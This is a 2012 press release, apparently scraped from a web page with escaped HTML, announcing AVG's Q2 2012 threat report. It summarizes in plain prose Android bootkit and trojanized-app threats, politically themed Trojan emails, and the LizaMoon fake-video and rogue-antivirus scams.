AVG (AU\/NZ) Pty Ltd today released AVG Technologies\u2019 Q2 2012 Community Powered Threat Report. This quarter\u2019s report investigates how cybercriminals have combined social engineering with more complex malware authoring for PC and mobile to increase impact, and that many of these are emerging from China.<\/p>\n
Android smartphone users remain a lucrative target as the platform currently has 59 percent global market share[1]<\/a> and is on track to stay the most shipped mobile operating system until 2016[2]<\/a>. Much of this new malware has also been identified as originating from China and targeting users there and in neighbouring markets, reflecting the fact that this is now the world\u2019s top smartphone market with over one million mobile web users[3]<\/a>.<\/p>\n The China connection <\/strong><\/p>\n This quarter saw the introduction of the first Android bootkit, \u2018DKFbootkit\u2019, which masquerades as a fake version of a legitimate application and damages the smartphone\u2019s Linux kernel code by replacing it with malicious code. Users are tricked into clicking \u2018OK\u2019 to the notifications the malware provides, giving it permission to add itself to the boot sequence and spring into life once the device is activated. In rooting the device, this attack turns the smartphone into a zombie that is fully under the cybercriminal\u2019s control, which makes it a serious threat to Android users. This attack is spread over the third party applications market \u2013 and not the official Google Play – in China.<\/p>\n Malware authors also spammed China, Japan, South Korea, Taiwan and the United States with Trojan-infected email messages related to political issues around Tibet.\u00a0 These were released on the back of a Microsoft \u2018Patch Tuesday\u2019 security bulletin[4]<\/a> with the authors rushing to take advantage of the \u2018window of opportunity\u2019 time lag between the patch release and when users were able to implement it. The email attachment contains an embedded encrypted executable file which collects sensitive user information such as passwords, and is able to download additional malware for key logger facility or to get a new Trojan configuration.<\/p>\n Michael McKinnon, Security Advisor at AVG (AU\/NZ), said: \u201cIn AVG\u2019s experience, an operating system attracts attention from cybercriminals once it secures five percent market share; once it reaches ten percent, it will be actively attacked.\u00a0 It\u2019s no surprise therefore that our investigations uncovered a further upsurge in malware targeting Android smartphones given its sustained popularity, with new attacks focused on rooting the devices to give cybercriminals full control. What\u2019s new this quarter is the significant upsurge in these threats originating from China.\u201d<\/p>\n The end of antivirus?<\/strong><\/p>\n For all of the sensationalism around the discovery of Stuxnet in 2010 and its 2012 equivalent, Flame, the average consumer was never actually a target for either malware. While rumours of cyber-attacks were circulated about both, Flame was actually not a patch on the sophistication of Stuxnet in terms of malware authoring and in particular, the techniques used in the payload were not very impressive. The security industry has already adapted to the unexpected nature of threats with traditional signature detection being just one layer within a multi-faceted security solution.<\/p>\n Consumer scams<\/strong><\/p>\n The latest version of the LizaMoon mass injection SQL attack this quarter deceives users into downloading a Trojan or some rogue software by exploiting human interest and hiding inside non-existent celebrity sex videos or fake antivirus websites. Injecting malicious code into legitimate but vulnerable websites, this attack targeted Mozilla\u2019s Firefox browser and Microsoft\u2019s Internet Explorer with two attack vectors. In Firefox, users are lured by raunchy videos of socialite Paris Hilton and actress Emma Watson and asked to update their Flash installation in order to view them. Users never get to see the video as the malware installed is a Trojan disguised as a Flash update.<\/p>\n In Internet Explorer, users receive a prompt seemingly from an antivirus website which would claim to have found malware on their computer. They are encouraged to download the malware and, once installed, to \u2018purchase it\u2019 which would then simply remove the malware in return for payment. Should the victim decide not to purchase, nag screens would pop up until the rogue was cleaned from the machine. In the most recent version, the malware was updated to enable \u2018drive-by downloads\u2019 where victims need only visit the website to become infected and it is no longer enough to close the web page to be safe.<\/p>\n Rovio\u2019s \u2018Angry Birds Space\u2019<\/a> application was also frontline for consumer scams this quarter. Using the same graphics as the legitimate version, a fully functional Trojan-infected version was uploaded to unofficial Android application stores. It uses the GingerBreak exploit to root the device, gaining Command and Control functionality to communicate with the remote server to download and install additional malware, botnet functionality, and to enable the modification of files and launch of URLs.<\/p>\n To download the full Q2 2012 Community Powered Threat Report, please visit:http:\/\/mediacenter.avg.com\/en\/press-tools\/avg-threat-reports\/avg-community-powered-threat-report-q2-2012.html<\/a><\/p>\n","protected":false},"excerpt":{"rendered":" AVG (AU\/NZ) Pty Ltd today released AVG Technologies\u2019 Q2 2012 Community Powered Threat Report. This quarter\u2019s report investigates how cybercriminals have combined social engineering with more complex malware authoring for PC and mobile to increase impact, and that many of these are emerging from China. Android smartphone users remain a lucrative target as the platform<\/p>\n